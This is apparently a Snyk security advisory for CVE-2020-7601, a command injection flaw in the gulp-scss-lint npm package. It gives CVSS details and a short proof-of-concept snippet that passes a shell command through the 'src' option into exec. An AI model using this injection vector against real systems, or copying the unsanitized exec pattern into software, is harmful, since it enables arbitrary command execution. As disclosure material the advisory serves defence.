Command Injection in gulp-scss-lint

Do your applications use this vulnerable package? Test your applications

Overview

gulp-scss-lint is a Lint your .scss files.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands to the exec function located in src/command.js via the provided options.

PoC by JHU System Security Lab

var root = require("gulp-scss-lint");
var attack_code = "echo vulnerable > create.txt";
var opt = {
  "src": attack_code
}
root(opt);

Remediation

A fix was pushed into the master branch but not yet published.

References

GitHub PR
Vulnerable Code

Attack Vector

Network
Attack Complexity

High
Privileges Required

None
User Interaction

None
Scope

Unchanged
Confidentiality

High
Integrity

None
Availability

None

Credit: JHU System Security Lab
CVE: CVE-2020-7601
CWE: CWE-78
Snyk ID: SNYK-JS-GULPSCSSLINT-560114
Disclosed: 13 Mar, 2020
Published: 13 Mar, 2020

Command Injection
Affecting gulp-scss-lint package, ALL versions

Overview

PoC by JHU System Security Lab

Remediation

References

CVSS Score

Command Injection Affecting gulp-scss-lint package, ALL versions

Overview

PoC by JHU System Security Lab

Remediation

References

Command Injection
Affecting gulp-scss-lint package, ALL versions